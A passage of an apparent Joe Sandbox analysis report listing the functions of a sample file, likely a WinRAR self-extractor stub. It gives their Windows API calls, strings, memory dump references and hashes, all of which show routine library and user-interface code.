                  • Instruction Fuzzy Hash: AB41B075D0061CAADB26DBA0EC45FEA77BDEF48311F0041A2F509E60A1E7719BC5CB50
                  Function 00A08E62 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 125memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GlobalAlloc.KERNEL32(00000040,?), ref: 00A08F38
                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00A08F59
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AllocByteCharGlobalMultiWide
                  • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                  • API String ID: 3286310052-4209811716
                  • Opcode ID: d800d0aa448e59313ade5e4c9921a1ccaa1adad0f43c8a0628d42700acc92730
                  • Instruction ID: 2cfe32bf7028aefb474a2961ce821c596a9f15144edd701ff3979c69e3909bd4
                  • Opcode Fuzzy Hash: d800d0aa448e59313ade5e4c9921a1ccaa1adad0f43c8a0628d42700acc92730
                  • Instruction Fuzzy Hash: E5317B3250831A7FDB20BB74FC02FAF7769EF51720F000529F941961D2EF689A4983A9
                  Function 00A09635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(?,00000000), ref: 00A0964E
                  • GetWindowRect.USER32(?,00000000), ref: 00A09693
                  • ShowWindow.USER32(?,00000005,00000000), ref: 00A0972A
                  • SetWindowTextW.USER32(?,00000000), ref: 00A09732
                  • ShowWindow.USER32(00000000,00000005), ref: 00A09748
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Window$Show$RectText
                  • String ID: RarHtmlClassName
                  • API String ID: 3937224194-1658105358
                  • Opcode ID: c959773222234cb1041baa16d0b480b2bf434c8615f9b9ca1bd7c3f546c944f9
                  • Instruction ID: db3b0912be463e1b0084b31b6e32004e665c9af87d82ab21383ba783a6754fe1
                  • Opcode Fuzzy Hash: c959773222234cb1041baa16d0b480b2bf434c8615f9b9ca1bd7c3f546c944f9
                  • Instruction Fuzzy Hash: 6D31AE32504308AFDB119FA4EC48B6B7BA8FF49712F004659FA499A1A3CB34D945CF61
                  Function 00A1BFB5 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A1BF79: _free.LIBCMT ref: 00A1BFA2
                  • _free.LIBCMT ref: 00A1C003
                    • Part of subcall function 00A184DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?), ref: 00A184F4
                    • Part of subcall function 00A184DE: GetLastError.KERNEL32(?,?,00A1BFA7,?,00000000,?,00000000,?,00A1BFCE,?,00000007,?,?,00A1C3CB,?,?), ref: 00A18506
                  • _free.LIBCMT ref: 00A1C00E
                  • _free.LIBCMT ref: 00A1C019
                  • _free.LIBCMT ref: 00A1C06D
                  • _free.LIBCMT ref: 00A1C078
                  • _free.LIBCMT ref: 00A1C083
                  • _free.LIBCMT ref: 00A1C08E
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction ID: 248604c16e40cf2f0cffabf06ea499dbf325f4889115c9fd7f14fd38c11ab9f4
                  • Opcode Fuzzy Hash: 11f2a1bb5d4160fb08a4b7348739aee2344f3630d5c617e2ee7e867637fc9caa
                  • Instruction Fuzzy Hash: 15112171590B08FAD630BBB0CE07FCBB79D6F04700F408955B2D966452DF6AF9858BA0
                  Function 00A120CA Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,00A120C1,00A0FB12), ref: 00A120D8
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A120E6
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A120FF
                  • SetLastError.KERNEL32(00000000,?,00A120C1,00A0FB12), ref: 00A12151
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: d6edb994fd026c2f49479e5de8d9b748c228dbf235994cc5d1a95d2031e65dfe
                  • Instruction ID: eaa46b460d001d5b1805051176f93403faca93f7e05b8732bc5c87efa747220d
                  • Opcode Fuzzy Hash: d6edb994fd026c2f49479e5de8d9b748c228dbf235994cc5d1a95d2031e65dfe
                  • Instruction Fuzzy Hash: 8B01D4372093117EAA74EBF97C856FA3A58EB227707210739F220590E0EF118CD79258
                  Function 00A0DC9A Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                  • API String ID: 0-1718035505
                  • Opcode ID: 7930277480d0eee98a1867112a06aa8082cb3a502a3480b5458de42271220303
                  • Instruction ID: 951d2798f2ca8884f1c5b8fb879ffcfdd0f7d8ea40bfc330a069fe0d8c743174
                  • Opcode Fuzzy Hash: 7930277480d0eee98a1867112a06aa8082cb3a502a3480b5458de42271220303
                  • Instruction Fuzzy Hash: D2012D336423266BDF30AFFC7C856B65794BB43317320163EE501D7280DAA1C883D6A0
                  Function 00A00CBE Relevance: 9.1, APIs: 6, Instructions: 94timeCOMMON
                  Download Yara Rule
                  APIs
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00D0D
                    • Part of subcall function 009FACF5: GetVersionExW.KERNEL32(?), ref: 009FAD1A
                  • LocalFileTimeToFileTime.KERNEL32(?,00A00CB8), ref: 00A00D31
                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00A00D47
                  • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00A00D56
                  • SystemTimeToFileTime.KERNEL32(?,00A00CB8), ref: 00A00D64
                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A00D72
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Time$File$System$Local$SpecificVersion
                  • String ID:
                  • API String ID: 2092733347-0
                  • Opcode ID: b7ec986a48ca2f5f25042b6bc9853557daf52624a7235625560c2734bdece29f
                  • Instruction ID: 934b1f502b958784a0074f5c0f4b25fc40866a85037b0d304c347d1a03fa2c1d
                  • Opcode Fuzzy Hash: b7ec986a48ca2f5f25042b6bc9853557daf52624a7235625560c2734bdece29f
                  • Instruction Fuzzy Hash: 1D31B77A90020DABCF10DFE9D8859EEBBB8FF58700B04456AE955E3210E7349646CB65
                  Function 00A091B0 Relevance: 9.1, APIs: 6, Instructions: 89COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _memcmp
                  • String ID:
                  • API String ID: 2931989736-0
                  • Opcode ID: 15e61ad01b4d9b12b0dd1fd16622f5f3a8d3f9279435907f0142b764fe53c617
                  • Instruction ID: 0ddd6162fbc92023188f85487b8cdf18128811e0d905d9f17ac46e09c8e5486e
                  • Opcode Fuzzy Hash: 15e61ad01b4d9b12b0dd1fd16622f5f3a8d3f9279435907f0142b764fe53c617
                  • Instruction Fuzzy Hash: 8021C471A0010EBBD7149F24ED81FBB77ADFB54788F108538FC09AB282E274ED558691
                  Function 00A18FA5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,00A30EE8,00A13E14,00A30EE8,?,?,00A13713,00000050,?,00A30EE8,00000200), ref: 00A18FA9
                  • _free.LIBCMT ref: 00A18FDC
                  • _free.LIBCMT ref: 00A19004
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A19011
                  • SetLastError.KERNEL32(00000000,?,00A30EE8,00000200), ref: 00A1901D
                  • _abort.LIBCMT ref: 00A19023
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 552dfa046ede6557a98165b57c8cbd300471e1fd1e2d810a9e3aa74474e74a9f
                  • Instruction ID: 816df4ca598aaf6704bd380a9ef0a6005a6b7fd6acdcf2f387317eb364a36b05
                  • Opcode Fuzzy Hash: 552dfa046ede6557a98165b57c8cbd300471e1fd1e2d810a9e3aa74474e74a9f
                  • Instruction Fuzzy Hash: 63F028366096006AC631B36C6D0AFFB292B9BD1770F250134F415D2292EF2CC9C39021
                  Function 00A0D2E6 Relevance: 9.0, APIs: 6, Instructions: 43windowsynchronizationCOMMON
                  Download Yara Rule
                  APIs
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A0D2F2
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00A0D30C
                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00A0D31D
                  • TranslateMessage.USER32(?), ref: 00A0D327
                  • DispatchMessageW.USER32(?), ref: 00A0D331
                  • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00A0D33C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                  • String ID:
                  • API String ID: 2148572870-0
                  • Opcode ID: 7c99ecff78c8edca1c9ef5b890a7931f310f091036c7491e8ad23049cd893307
                  • Instruction ID: 887b32c083cc73982ba38dc791f46141a741e55413b30bd737d774e30c258ce7
                  • Opcode Fuzzy Hash: 7c99ecff78c8edca1c9ef5b890a7931f310f091036c7491e8ad23049cd893307
                  • Instruction Fuzzy Hash: ABF0CD72A0221DABCA209BE5EC4CEDBBF6DEF56762B044021F606D6090D6259942C7B1
                  Function 00A0C40E Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                  Download Yara Rule
                  APIs
                  • _wcschr.LIBVCRUNTIME ref: 00A0C435
                    • Part of subcall function 00A017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,009FBB05,00000000,.exe,?,?,00000800,?,?,00A085DF,?), ref: 00A017C2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CompareString_wcschr
                  • String ID: <$HIDE$MAX$MIN
                  • API String ID: 2548945186-3358265660
                  • Opcode ID: 2efddaf4c436017967b9152e3b163c669b57926fb85f566cf30a4cc3185a4eb5
                  • Instruction ID: 2da31a101405298876e118bbe7529ecf53549ff25e530369be53411612a139b1
                  • Opcode Fuzzy Hash: 2efddaf4c436017967b9152e3b163c669b57926fb85f566cf30a4cc3185a4eb5
                  • Instruction Fuzzy Hash: 2531A176E0020DAADB21DBA4EC85EEA77BDFB54360F004166FA04D20D0EBB18EC48A50
                  Function 00A0ADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON
                  Download Yara Rule
                  APIs
                  • LoadBitmapW.USER32(00000065), ref: 00A0ADFD
                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00A0AE22
                  • DeleteObject.GDI32(00000000), ref: 00A0AE54
                  • DeleteObject.GDI32(00000000), ref: 00A0AE77
                    • Part of subcall function 00A09E1C: FindResourceW.KERNEL32(00A0AE4D,PNG,?,?,?,00A0AE4D,00000066), ref: 00A09E2E
                    • Part of subcall function 00A09E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E46
                    • Part of subcall function 00A09E1C: LoadResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E59
                    • Part of subcall function 00A09E1C: LockResource.KERNEL32(00000000,?,?,?,00A0AE4D,00000066), ref: 00A09E64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                  • String ID: ]
                  • API String ID: 142272564-3352871620
                  • Opcode ID: 94246b69a34ec67812d3d9a08c45fa2a9883e20dc663a8a15468ac12b8c93c72
                  • Instruction ID: c307855a405a53f7ef72aaf488e148232bad22a89b8ec08513f31d7bfcaeee05
                  • Opcode Fuzzy Hash: 94246b69a34ec67812d3d9a08c45fa2a9883e20dc663a8a15468ac12b8c93c72
                  • Instruction Fuzzy Hash: 6001D63298132DA7D710A7A4FD05B7F7B7AAB92B52F180115FD00A72D2DB718C1687B1
                  Function 00A0CC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 009F130B: GetDlgItem.USER32(00000000,00003021), ref: 009F134F
                    • Part of subcall function 009F130B: SetWindowTextW.USER32(00000000,00A235B4), ref: 009F1365
                  • EndDialog.USER32(?,00000001), ref: 00A0CCDB
                  • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 00A0CCF1
                  • SetDlgItemTextW.USER32(?,00000066,?), ref: 00A0CD05
                  • SetDlgItemTextW.USER32(?,00000068), ref: 00A0CD14
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: RENAMEDLG
                  • API String ID: 445417207-3299779563
                  • Opcode ID: 92d2fb40987e5a9b2d1cc1ff4ff4418eb2418468ec84b65bd3c56d282b13ff93
                  • Instruction ID: ba298fbb20738e0ab13d13e0bde7c9c558dea4c569f2deea012137f849d714aa
                  • Opcode Fuzzy Hash: 92d2fb40987e5a9b2d1cc1ff4ff4418eb2418468ec84b65bd3c56d282b13ff93
                  • Instruction Fuzzy Hash: A00128332853187FE111CFA4FD08F6B3B6CFB9B712F100610F346A20E0C6A2591687A5
                  Function 00A175C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00A17573,00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002), ref: 00A175E2
                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00A175F5
                  • FreeLibrary.KERNEL32(00000000,?,?,?,00A17573,00000000,?,00A17513,00000000,00A2BAD8,0000000C,00A1766A,00000000,00000002), ref: 00A17618
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressFreeHandleLibraryModuleProc
                  • String ID: CorExitProcess$mscoree.dll
                  • API String ID: 4061214504-1276376045
                  • Opcode ID: 8fdbe0e1fdba6f381dd47aa3c37ea4b28c63113c785b75dc04e538b4af36ea06
                  • Instruction ID: 13f03d4aa1f14e34c4a547d0bd22b9d578665f6699120da71a60a0e1eaa549cc
                  • Opcode Fuzzy Hash: 8fdbe0e1fdba6f381dd47aa3c37ea4b28c63113c785b75dc04e538b4af36ea06
                  • Instruction Fuzzy Hash: 05F04F31A0861CBBDF25DBA8DD09BEDBFB9EF04711F004178F805A2150DB748A82CB94
                  Function 009FEB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00A00085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00A000A0
                    • Part of subcall function 00A00085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,009FEB86,Crypt32.dll,00000000,009FEC0A,?,?,009FEBEC,?,?,?), ref: 00A000C2
                  • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FEB92
                  • GetProcAddress.KERNEL32(00A381C0,CryptUnprotectMemory), ref: 009FEBA2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressProc$DirectoryLibraryLoadSystem
                  • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
                  • API String ID: 2141747552-1753850145
                  • Opcode ID: c6d35e920a5db0ac8aa09cc96af6a87cf4d71e23b77e19fbf7e0d1a716a287a0
                  • Instruction ID: 7f1def3aee630c76ee930a62d3c862ac6f8d86f0839f7b8106895aab6dd693bd
                  • Opcode Fuzzy Hash: c6d35e920a5db0ac8aa09cc96af6a87cf4d71e23b77e19fbf7e0d1a716a287a0
                  • Instruction Fuzzy Hash: 95E04F72505751AECF309F7DA818B52BAE46B17B11F008C2DE4D6D3590D6F8D5818B60
                  Function 00A17DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
